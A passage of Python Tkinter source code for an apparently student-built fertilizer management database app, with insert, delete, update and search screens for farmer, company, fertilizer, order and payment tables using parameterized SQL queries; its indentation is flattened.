data =cur.fetchall()
db.commit()
if len(data)!=0:
for row in data:
table.insert('',END,values=row)
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_farmer():
global e1,e2,e3,e4,e5,e6
#clean the window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#create the window
label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Farmer_name',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Farmer_phone',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Farmer_mail',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='Farmer_locality',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
label=Label(root,text='Farmer_address',font=('Times new roman',20),bg='white')
label.place(x=50,y=270)
e1=Entry(root,width=50)
e2=Entry(root,width=50)
e3=Entry(root,width=50)
e4=Entry(root,width=50)
e5=Entry(root,width=50)
e6=Entry(root,width=50)
e1.place(x=350,y=10)
e2.place(x=350,y=60)
e3.place(x=350,y=110)
e4.place(x=350,y=160)
e5.place(x=350,y=210)
e6.place(x=350,y=270)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_farmer_command)
Button.place(x=400, y=400)
def insert_farmer_command():
global root
try:
sql="INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);"
if len(e1.get())>3:
invalid('farmer')
else:
vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get(),e6.get()
cur.executemany(sql,[vals])
db.commit()
farmer()
except:
insert_farmer()
def invalid(page):
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
if page=='farmer':
label=Label(root,text='Enter valid farmer_id',font=('Times new roman',30),bg='white')
label.place(x=170,y=200)
button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_farmer)
button.place(x=300,y=400)
elif page=='company':
label=Label(root,text='Enter valid company_id',font=('Times new roman',30),bg='white')
label.place(x=170,y=200)
button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_company)
button.place(x=300,y=400)
def delete_farmer():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_farmer_command)
Button.place(x=400, y=400)
def delete_farmer_command():
try:
sql="DELETE FROM farmer WHERE f_id=%s;"
cur.execute(sql,[e1.get()])
db.commit()
farmer()
except:
l=Label(root,text='Invalid Entry',font=('times new roman',15))
l.place(x=100,y=300)
def update_farmer():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=update)
Button.place(x=300, y=400)
def update():
try:
global e1,e2,e3,e4,e5,e6
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
sql='SELECT * FROM farmer WHERE f_id=%s;'
vals=[e1.get()]
cur.execute(sql,vals)
label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Farmer_name',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Farmer_phone',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Farmer_mail',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='Farmer_locality',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
label=Label(root,text='Farmer_address',font=('Times new roman',20),bg='white')
label.place(x=50,y=270)
e1=Entry(root)
e2=Entry(root)
e3=Entry(root)
e4=Entry(root)
e5=Entry(root)
e6=Entry(root)
data=cur.fetchall()
arr=[e1,e2,e3,e4,e5,e6]
count=0
for val in data[0]:
arr[count].insert(0,val)
count+=1
e1.place(x=350,y=10)
e2.place(x=350,y=60)
e3.place(x=350,y=110)
e4.place(x=350,y=160)
e5.place(x=350,y=210)
e6.place(x=350,y=270)
label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command)
label.place(x=300,y=400)
except:
l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))
l.place(x=100,y=300)
update_farmer()
def update_command():
try:
sql="UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;"
vals=e2.get(),e3.get(),e4.get(),e5.get(),e6.get(),e1.get()
cur.executemany(sql,[vals])
db.commit()
farmer()
except:
update_farmer()
def search_farmer():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search)
Button.place(x=400, y=400)
def search():
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
try:
sql='SELECT * FROM farmer WHERE f_id=%s;'
val=[e1.get()]
cur.execute(sql,val)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=farmer)
Button.place(x=300, y=400)
for val in cur:
count=0
Y=50
names=['farmer id: ','farmer name: ','farmer phone: ','farmer mail: ','farmer locality: ','farmer address: ']
for i in val:
label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
label.place(x=10,y=Y)
Y+=50
count+=1
db.commit()
except:
l=Label(root,text='Invalid Farmer Id',font=('times new roman',15))
l.place(x=100,y=300)
search_farmer()
#company page
def company():
global root
#clean previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Company Table',font=('Times new roman',15),bg='white')
label.place(x=350,y=10)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_company)
Button.place(x=110, y=50)
Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_company)
Button.place(x=210, y=50)
Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_company)
Button.place(x=310, y=50)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_company)
Button.place(x=410, y=50)
view_company()
def view_company():
frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
frame.place(x=10,y=100,width=750,height=400)
x_scroll=Scrollbar(frame,orient=HORIZONTAL)
y_scroll=Scrollbar(frame,orient=VERTICAL)
table=ttk.Treeview(frame,columns=("c_id",'c_name','c_address'),xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM,fill=X)
y_scroll.pack(side=RIGHT,fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('c_id',text="Company Id")
table.heading('c_name',text="Company Name")
table.heading('c_address',text="Company Address")
table['show']='headings'
table.column("c_id",width=100)
table.pack()
cur.execute("SELECT * FROM company;")
data =cur.fetchall()
db.commit()
if len(data)!=0:
for row in data:
table.insert('',END,values=row)
def insert_company():
global e1,e2,e3,e4,e5,e6
#clean the window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#create the window
label=Label(root,text='Company_id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Company_name',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Company_address',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root,width=50)
e2=Entry(root,width=50)
e3=Entry(root,width=50)
e1.place(x=350,y=10)
e2.place(x=350,y=110)
e3.place(x=350,y=210)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_company_command)
Button.place(x=400, y=400)
def insert_company_command():
try:
if len(e1.get())>3:
invalid("company")
else:
sql="INSERT INTO company values(%s,%s,%s);"
vals=e1.get(),e2.get(),e3.get()
cur.executemany(sql,[vals])
db.commit()
company()
except:
insert_company()
def delete_company():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_company_command)
Button.place(x=400, y=400)
def delete_company_command():
try:
sql="DELETE FROM company WHERE c_id=%s;"
cur.execute(sql,[int(e1.get())])
db.commit()
company()
except:
l=Label(root,text='Invalid Entry',font=('times new roman',15))
l.place(x=100,y=300)
def update_company():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_c)
Button.place(x=300, y=400)
def update_c():
try:
global e1,e2,e3,e4,e5,e6
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
sql='SELECT * FROM company WHERE c_id=%s;'
vals=[e1.get()]
cur.execute(sql,vals)
label=Label(root,text='Company_id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Company_name',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Company_address',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root)
e2=Entry(root)
e3=Entry(root)
data=cur.fetchall()
arr=[e1,e2,e3]
count=0
for val in data[0]:
arr[count].insert(0,val)
count+=1
e1.place(x=350,y=10)
e2.place(x=350,y=110)
e3.place(x=350,y=210)
label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_c)
label.place(x=300,y=400)
except:
l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))
l.place(x=100,y=300)
update_company()
def update_command_c():
try:
sql="UPDATE company SET c_name=%s,c_address=%s WHERE c_id=%s;"
vals=e2.get(),e3.get(),e1.get()
cur.executemany(sql,[vals])
db.commit()
company()
except:
update_company()
def search_company():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_c)
Button.place(x=400, y=400)
def search_c():
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
try:
sql='SELECT * FROM company WHERE c_id=%s;'
val=[e1.get()]
cur.execute(sql,val)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=company)
Button.place(x=300, y=400)
for val in cur:
count=0
Y=50
names=['company id: ','company name: ','company address: ']
for i in val:
label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
label.place(x=10,y=Y)
Y+=50
count+=1
db.commit()
except:
l=Label(root,text='Invalid Company Id',font=('times new roman',15))
l.place(x=100,y=300)
search_company()
#fertilizer page
def fertilizer():
global root
#clean previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Fertilizer Table',font=('Times new roman',15),bg='white')
label.place(x=350,y=10)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_fer)
Button.place(x=110, y=50)
Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_fer)
Button.place(x=210, y=50)
Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_fer)
Button.place(x=310, y=50)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_fer)
Button.place(x=410, y=50)
view_fer()
def view_fer():
frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
frame.place(x=10,y=100,width=750,height=400)
x_scroll=Scrollbar(frame,orient=HORIZONTAL)
y_scroll=Scrollbar(frame,orient=VERTICAL)
table=ttk.Treeview(frame,columns=("fe_formula",'fe_name','fe_content','fe_price','company_id'),xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM,fill=X)
y_scroll.pack(side=RIGHT,fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('fe_formula',text="Fertilizer Formula")
table.heading('fe_name',text="Fertilizer name")
table.heading('fe_content',text="Fertilizer content")
table.heading('fe_price',text="Fertilizer price")
table.heading('company_id',text="Company_id")
#table.heading('f_address',text="Farmer Address")
table['show']='headings'
#table.column("f_id",width=100)
table.pack()
cur.execute("SELECT * FROM fertilizer;")
data =cur.fetchall()
db.commit()
if len(data)!=0:
for row in data:
table.insert('',END,values=row)
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_fer():
global e1,e2,e3,e4,e5,e6
#clean the window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#create the window
label=Label(root,text='Fertlizer formula',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Fertlizer name',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Fertilizer content',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Fertlizer price',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='Company id',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root,width=50)
e2=Entry(root,width=50)
e3=Entry(root,width=50)
e4=Entry(root,width=50)
e5=Entry(root,width=50)
#e6=Entry(root,width=50)
e1.place(x=350,y=10)
e2.place(x=350,y=60)
e3.place(x=350,y=110)
e4.place(x=350,y=160)
e5.place(x=350,y=210)
#e6.place(x=350,y=270)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_fer_command)
Button.place(x=400, y=400)
def insert_fer_command():
try:
sql="INSERT INTO fertilizer values(%s,%s,%s,%s,%s);"
vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()
cur.executemany(sql,[vals])
db.commit()
fertilizer()
except:
insert_fer()
def delete_fer():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Fertilizer formula:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_fer_command)
Button.place(x=400, y=400)
def delete_fer_command():
try:
sql="DELETE FROM fertilizer WHERE fe_formula=%s;"
cur.execute(sql,[e1.get()])
db.commit()
fertilizer()
except:
l=Label(root,text='Invalid Entry',font=('times new roman',15))
l.place(x=100,y=300)
def update_fer():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Fertlizer formula:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_fe)
Button.place(x=300, y=400)
def update_fe():
try:
global e1,e2,e3,e4,e5,e6
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
sql='SELECT * FROM fertilizer WHERE fe_formula=%s;'
vals=[e1.get()]
cur.execute(sql,vals)
label=Label(root,text='Fertlizer formula',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Fertlizer name',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Fertlizer content',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Fertlizer price',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='comapny_id',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root)
e2=Entry(root)
e3=Entry(root)
e4=Entry(root)
e5=Entry(root)
#e6=Entry(root)
data=cur.fetchall()
arr=[e1,e2,e3,e4,e5,e6]
count=0
for val in data[0]:
arr[count].insert(0,val)
count+=1
e1.place(x=350,y=10)
e2.place(x=350,y=60)
e3.place(x=350,y=110)
e4.place(x=350,y=160)
e5.place(x=350,y=210)
#e6.place(x=350,y=270)
label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_fe)
label.place(x=300,y=400)
except:
l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))
l.place(x=100,y=300)
update_fer()
def update_command_fe():
sql="UPDATE fertilizer SET fe_name=%s,fe_content=%s,fe_price=%s,company_id=%s WHERE fe_formula=%s;"
vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()
cur.executemany(sql,[vals])
db.commit()
fertilizer()
def search_fer():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Fertlizer formula:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_fe)
Button.place(x=400, y=400)
def search_fe():
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
try:
sql='SELECT * FROM fertilizer WHERE fe_formula=%s;'
val=[e1.get()]
cur.execute(sql,val)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=fertilizer)
Button.place(x=300, y=400)
for val in cur:
count=0
Y=50
names=['fertilizer formula: ','fertilizer name: ','fertilizer content: ','fertilizer price: ','company_id: ']
for i in val:
label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
label.place(x=10,y=Y)
Y+=50
count+=1
db.commit()
except:
l=Label(root,text='Invalid Fertilizer formula',font=('times new roman',15))
l.place(x=100,y=300)
search_fer()
#order page
def orders():
global root
#clean previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Orders Table',font=('Times new roman',15),bg='white')
label.place(x=350,y=10)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_ord)
Button.place(x=110, y=50)
Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_ord)
Button.place(x=210, y=50)
Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_ord)
Button.place(x=310, y=50)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_ord)
Button.place(x=410, y=50)
view_ord()
def view_ord():
frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
frame.place(x=10,y=100,width=750,height=400)
x_scroll=Scrollbar(frame,orient=HORIZONTAL)
y_scroll=Scrollbar(frame,orient=VERTICAL)
table=ttk.Treeview(frame,columns=("or_id",'or_date','or_fid','or_formula','or_to'),xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM,fill=X)
y_scroll.pack(side=RIGHT,fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('or_id',text="Order Id")
table.heading('or_date',text="Order Date")
table.heading('or_fid',text="Ordered Farmer Id")
table.heading('or_formula',text="Order (item)formula")
table.heading('or_to',text="Order to")
#table.heading('f_address',text="Farmer Address")
table['show']='headings'
#table.column("f_id",width=100)
table.pack()
cur.execute("SELECT * FROM orders;")
data =cur.fetchall()
db.commit()
if len(data)!=0:
for row in data:
table.insert('',END,values=row)
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_ord():
global e1,e2,e3,e4,e5,e6
#clean the window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#create the window
label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Order date',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Order FID',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='Order to',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root,width=50)
e2=Entry(root,width=50)
e3=Entry(root,width=50)
e4=Entry(root,width=50)
e5=Entry(root,width=50)
#e6=Entry(root,width=50)
e1.place(x=350,y=10)
e2.place(x=350,y=60)
e2.insert(0,datetime.now())
e3.place(x=350,y=110)
e4.place(x=350,y=160)
e5.place(x=350,y=210)
#e6.place(x=350,y=270)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_ord_command)
Button.place(x=400, y=400)
def insert_ord_command():
try:
sql="INSERT INTO orders values(%s,%s,%s,%s,%s);"
vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()
cur.executemany(sql,[vals])
db.commit()
orders()
except:
insert_ord()
def delete_ord():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_ord_command)
Button.place(x=400, y=400)
def delete_ord_command():
try:
sql="DELETE FROM orders WHERE or_id=%s;"
cur.execute(sql,[e1.get()])
db.commit()
orders()
except:
l=Label(root,text='Invalid Entry',font=('times new roman',15))
l.place(x=100,y=300)
def update_ord():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_or)
Button.place(x=300, y=400)
def update_or():
try:
global e1,e2,e3,e4,e5,e6
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
sql='SELECT * FROM orders WHERE or_id=%s;'
vals=[e1.get()]
cur.execute(sql,vals)
label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Order Date',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Order f_id',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='Order to',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root)
e2=Entry(root)
e3=Entry(root)
e4=Entry(root)
e5=Entry(root)
#e6=Entry(root)
data=cur.fetchall()
arr=[e1,e2,e3,e4,e5,e6]
count=0
for val in data[0]:
arr[count].insert(0,val)
count+=1
e1.place(x=350,y=10)
e2.place(x=350,y=60)
#e2.insert(0,datetime.now())
e3.place(x=350,y=110)
e4.place(x=350,y=160)
e5.place(x=350,y=210)
#e6.place(x=350,y=270)
label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_ord)
label.place(x=300,y=400)
except:
l=Label(root,text='Invalid Order_id',font=('times new roman',15))
l.place(x=100,y=300)
update_ord()
def update_command_ord():
sql="UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;"
vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()
cur.executemany(sql,[vals])
db.commit()
orders()
def search_ord():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_or)
Button.place(x=400, y=400)
def search_or():
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
try:
sql='SELECT * FROM orders WHERE or_id=%s;'
val=[e1.get()]
cur.execute(sql,val)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=orders)
Button.place(x=300, y=400)
for val in cur:
count=0
Y=50
names=['order Id: ','Order date: ','Order fid: ','Order formula: ','order to: ']
for i in val:
label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
label.place(x=10,y=Y)
Y+=50
count+=1
db.commit()
except:
l=Label(root,text='Invalid order id',font=('times new roman',15))
l.place(x=100,y=300)
search_ord()
#payment page
def payment():
global root
#clean previous window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Payment Table',font=('Times new roman',15),bg='white')
label.place(x=350,y=10)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_pay)
Button.place(x=110, y=50)
Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_pay)
Button.place(x=210, y=50)
Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_pay)
Button.place(x=310, y=50)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_pay)
Button.place(x=410, y=50)
view_pay()
def view_pay():
frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
frame.place(x=10,y=100,width=750,height=400)
x_scroll=Scrollbar(frame,orient=HORIZONTAL)
y_scroll=Scrollbar(frame,orient=VERTICAL)
table=ttk.Treeview(frame,columns=("trans_id",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM,fill=X)
y_scroll.pack(side=RIGHT,fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id',text="Transaction Id")
table.heading('p_f_id',text="Farmer Id")
table.heading('p_date',text="Payment Date")
table.heading('p_amount',text="Amount")
table.heading('p_method',text="Payment Method")
#table.heading('f_address',text="Farmer Address")
table['show']='headings'
#table.column("f_id",width=100)
table.pack()
cur.execute("SELECT * FROM payment;")
data =cur.fetchall()
db.commit()
if len(data)!=0:
for row in data:
table.insert('',END,values=row)
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_pay():
global e1,e2,e3,e4,e5,e6
#clean the window
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#create the window
label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Transaction farmer id',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root,width=50)
e2=Entry(root,width=50)
e3=Entry(root,width=50)
e4=Entry(root,width=50)
e5=Entry(root,width=50)
#e6=Entry(root,width=50)
e1.place(x=350,y=10)
e2.place(x=350,y=60)
#e2.insert(0,datetime.now())
e3.place(x=350,y=110)
e3.insert(0,datetime.now())
e4.place(x=350,y=160)
#e5.place(x=350,y=210)
e5 = StringVar(root)
e5.set("Debit card") # default value
w= OptionMenu(root, e5, "Credit Card", "UPI", "Cheque","Cash")
w.place(x=350,y=210)
#mainloop()
#e6.place(x=350,y=270)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_pay_command)
Button.place(x=400, y=400)
def insert_pay_command():
try:
sql="INSERT INTO payment values(%s,%s,%s,%s,%s);"
vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()
cur.executemany(sql,[vals])
db.commit()
payment()
except:
insert_pay()
def delete_pay():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_pay_command)
Button.place(x=400, y=400)
